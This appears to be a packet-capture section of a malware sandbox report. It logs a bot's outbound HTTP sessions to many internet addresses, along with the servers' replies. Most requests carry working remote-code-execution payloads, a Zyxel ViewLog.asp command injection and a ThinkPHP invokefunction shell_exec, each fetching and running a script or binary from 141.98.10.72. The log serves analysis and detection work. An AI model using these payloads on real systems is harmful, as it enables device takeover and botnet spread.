                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1321192.168.2.143738231.136.11.758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.334835052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.961822987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:02.209846973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:04.705667973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:09.825546026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1322192.168.2.144379285.238.65.1248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.351346970 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.579189062 CET427INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        X-Frame-Options: SAMEORIGIN
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Content-Length: 189
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 4e cb 0e 82 30 10 bc f3 15 2b 77 59 34 1e 9b 1e 78 18 49 50 89 c1 03 c7 62 9b 40 82 14 db ad c6 bf b7 c0 c9 cb 24 b3 33 3b 33 6c 93 5d d3 ba a9 72 38 d5 e7 12 aa 7b 52 16 29 84 5b c4 22 af 8f 88 59 9d ad ca 3e 8a 11 f3 4b c8 03 d6 d1 73 e0 ac 53 42 7a 42 3d 0d 8a 1f e2 18 12 21 e1 a6 5e 4e 59 62 b8 9e 03 86 8b 8d b5 5a 7e e7 cf 1d ff 73 79 1e b0 89 37 da 19 68 8d fe 58 65 c0 aa 91 40 80 59 93 80 3a 41 1e 7a eb 05 f3 f6 fa 43 bb 41 c2 a8 09 dc 28 95 b1 24 46 19 b1 d6 00 fa 2c 9c 66 58 da 7c f5 bc 33 f8 01 ce 5b 1b f3 e2 00 00 00
                                                        Data Ascii: UN0+wY4xIPb@$3;3l]r8{R)["Y>KsSBzB=!^NYbZ~sy7hXe@Y:AzCA($F,fX|3[


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1323192.168.2.144892095.112.122.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.411966085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.778053999 CET55INData Raw: 53 53 48 2d 32 2e 30 2d 4f 70 65 6e 53 53 48 5f 37 2e 39 70 31 20 52 61 73 70 62 69 61 6e 2d 31 30 2b 64 65 62 31 30 75 32 0d 0a
                                                        Data Ascii: SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u2


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1324192.168.2.143369495.86.92.5380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.461009026 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1325192.168.2.144432694.228.112.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.483587027 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.729159117 CET291INHTTP/1.1 404 Not Found
                                                        Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 14 Feb 2024 08:35:59 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1326192.168.2.145407694.122.2.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.485382080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1327192.168.2.145151294.120.47.448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.486459017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1328192.168.2.144811662.29.14.628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.486742020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1329192.168.2.145606895.86.90.818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.493746042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1330192.168.2.1441428112.197.122.19580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.513185978 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.873389006 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 15:36:00 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1331192.168.2.1435394112.29.230.21580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.528105021 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.900379896 CET358INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 213
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 61 6e 68 75 69 2d 68 75 61 69 6e 61 6e 2d 36 2d 32 32 33 2d 32 34 37 2d 31 30 37 2d 32 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-anhui-huainan-6-223-247-107-215</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1332192.168.2.144480094.203.74.718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.567337036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:00.900674105 CET1169INHTTP/1.1 404 Not Found
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        Set-Cookie: JSESSIONID=8AED289C936463E4ADC56CEE2F9EFE27; Path=/; HttpOnly
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 890
                                                        Date: Wed, 14 Feb 2024 08:36:01 GMT
                                                        Server: SuperSign
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 52 52 4f 52 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 68 74 6d 6c 2c 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 70 61 64 64 69 6e 67 3a 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 31 61 31 61 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 20 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 2e 74 65 78 74 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 25 3b 20 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 34 29 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 2e 74 65 78 74 20 73 74 72 6f 6e 67 20 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 63 6f 6c 6f 72 3a 23 63 66 30 36 35 32 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 30 70 78 3b 7d 0d 0a 2e 6e 6f 74 46 6f 75 6e 64 20 2e 74 65 78 74 20 70 20 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 46 6f 75 6e 64 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 0d 0a 09 09 3c 73 74 72 6f 6e 67 3e 34 30 34 3c 2f 73 74 72 6f 6e 67 3e 0d 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8"><title>404 ERROR</title><style>html,body {width:100%; height:100%; margin:0; padding:0; background:#1a1a1a;}.notFound {display:flex; display:-webkit-flex; display:-ms-flexbox; width:100%; height:100%; font-size:40px; justify-content:center;align-items:center;-webkit-justify-content:center; -webkit-align-items:center; -ms-flex-pack:center; -ms-flex-align:center;}.notFound .text {margin-bottom:20%; color:rgba(255, 255, 255, 0.4); font-weight:bold; text-align:center;}.notFound .text strong {display:block; color:#cf0652; font-size:140px;}.notFound .text p {display:block; margin:0; font-size:24px; text-decoration:underline;}</style></head><body><div class="notFound"><div class="text"><strong>404</strong><p>The page you are looking for can't be found.</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1333192.168.2.144373495.214.9.18380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.633580923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.857108116 CET420INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:36:00 GMT
                                                        Server: Apache/2.4.37 (centos)
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1334192.168.2.145886895.181.146.280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.683324099 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1335192.168.2.145661095.57.73.13980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:00.703032017 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:00.995224953 CET29INHTTP/1.1 200 OK
